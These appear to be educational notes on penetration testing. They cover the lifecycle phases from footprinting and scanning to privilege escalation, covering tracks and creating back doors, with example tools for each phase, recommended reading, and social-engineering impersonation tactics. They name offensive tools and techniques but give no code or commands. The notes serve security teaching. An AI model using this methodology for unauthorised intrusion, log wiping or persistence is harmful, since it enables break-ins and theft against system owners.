Penetration testing evaluates the strength of all security controls - procedural, operational, and technological. It is the first line of network defense: a systematic way to discover vulnerabilities and demonstrate how threats can materialize.
Evaluate how secure the network really is - end-to-end, including mobile and BYOD.
Identify weaknesses before attackers do. Prioritize remediation based on real risk.
Exploit vulnerabilities to show likelihood and impact of real attacks.
Can include social engineering and physical access - not just technical or cyber operations.
Security of the entire network - servers, clients, mobile devices, BYOD, and infrastructure.
Penetration testing follows a structured lifecycle. Each phase builds on the previous; the last steps (pilfering, covering tracks, back doors) can be iterated as the tester moves laterally across the network.
| Phase | Goal | Tools (Examples) |
|---|---|---|
| Footprinting | Recon, IP ranges, namespace, topology | whois, nslookup, dig, Sam Spade, Google |
| Scanning | Live hosts, open ports, services, OS | nmap, fping, Superscan, queso, siphon |
| Enumeration | User accounts, file shares, banners | dumpACL, showmount, legion, rpcinfo, netcat |
| Gaining Access | Exploit vulnerabilities | tcpdump, L0phtcrack, legion, pwddump2, ttdb |
| Escalating Privilege | Root/superuser access | John the Ripper, Getadmin, sechole |
| Pilfering | Trusts, credentials, config files | rhosts, LSA secrets, registry |
| Covering Tracks | Hide evidence | Zap, rootkits, file streaming |
| Creating Back Doors | Persistence | Netcat, cron, at, startup folder, keystroke loggers |
Gather general information: target IP/phone ranges, namespace, network topology. Essential for a surgical attack - you need IP addresses to scan, domain names for DNS, and topology to plan lateral movement.
Google, Edgar, search engines - domain name, admins, IP addresses, name servers.
whois (Network
Solutions, ARIN),
nslookup (ls -d), dig - zone
transfers.
VisualRoute, traceroute - map paths and hops to understand network layout.
Discover which machines are up, which ports are open, which services run, and their versions. Look up known vulnerabilities for those versions. Focus on most promising avenues (e.g., always-on web services) while reducing scan frequency and randomizing order to avoid detection.
One of the most popular tools - performs ping sweep, port scan, service/version detection, and OS fingerprinting in a single toolkit.
Identify valid user accounts and poorly protected resource shares. More intrusive than scanning - targeted probing for accounts, file shares, and application info.
Null sessions, dumpACL, Sid2user, onSiteAdmin - list accounts for password spraying or cred stuffing.
showmount, NAT, legion - discover NFS/SMB shares, often misconfigured.
telnet, netcat, rpcinfo - identify application versions for vuln lookup.
Identify a vulnerability from scanning/enumeration and exploit it. Often with existing tools (Metasploit, custom scripts). Automatic exploit generation from a new vuln is still an open problem - manual work is usually required.
tcpdump, ssldump - capture cleartext or cracked credentials on the wire.
L0phtcrack, readsmb, legion - file share and password cracking.
Buffer overflow, IIS .HTR/ISM.DLL - exploit vulnerable service versions.
If only user-level access was obtained, seek root/superuser. Tools: John the Ripper, L0phtcrack (password cracking), Getadmin, sechole (known privilege escalation exploits).
Gather info to access trusted systems: evaluate trusts, search for cleartext passwords in rhosts, LSA secrets, config files, registry.
Once total ownership is secured, hide evidence. Clear logs (Zap, Event Log GUI), hide tools (rootkits, file streaming).
Ensure easy re-entry: rogue accounts, cron/at jobs, startup folder/registry, Netcat listeners, keystroke loggers, remote desktop/VNC.
Persistence and stealth - iterate: move from one host/account to the next, capture credentials, install backdoors, hide tracks. Insert proxies or MITM to record traffic and identify high-value targets.
Footprint IP/domain, scan ports/services, enumerate users and shares.
Gain access, escalate to root, steal credentials for lateral movement.
Hide evidence, create persistence. Iterate across the network.
Ping sweep, port scan, service detection, OS fingerprinting.
Vulnerability exploitation, scanning, reporting.
Identify policy gaps; users are the weakest link.
Peter Kim - practical guide: Kali setup, scanning, Metasploit, SQLi/XSS/CSRF, lateral movement, social engineering, reporting.
Web app vulns: injection, broken auth, XSS, broken access control, misconfiguration.
Web security audit - reflected/stored XSS, session hijacking, ReDoS, tabnabbing.
Social Engineering
Social engineering is a fast, low-risk method to gain access. It abuses trusted relationships, requires no specialized equipment, and manipulates users into undermining their own security.
Impersonation Types
Blend in; look for passwords on sticky notes, unattended papers, confidential conversations.
Uniform - rarely questioned. May plant surveillance or access sensitive areas.
Pretend to be in charge (in person or by phone). Third-party authorization trick.
Send mail asking for personal info - users tend to trust printed materials more than email.
Computer-Based Attacks
Countermeasures